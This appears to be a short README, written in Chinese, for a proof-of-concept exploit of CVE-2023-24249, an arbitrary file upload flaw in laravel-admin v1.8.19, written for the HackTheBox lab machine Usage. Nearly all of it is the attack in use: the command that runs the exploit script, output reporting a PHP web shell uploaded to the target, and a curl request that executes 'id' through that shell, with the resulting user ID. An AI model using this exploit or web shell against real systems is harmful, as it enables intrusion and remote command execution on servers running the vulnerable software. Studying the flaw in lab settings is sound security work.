CVE-2023-24249 是 laravel-admin v1.8.19 中的一个任意文件上传漏洞。该概念验证利用此漏洞上传 Web Shell。
该漏洞利用程序是为针对 HackTheBox 的简单机器 Usage 而编写的。
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php
curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)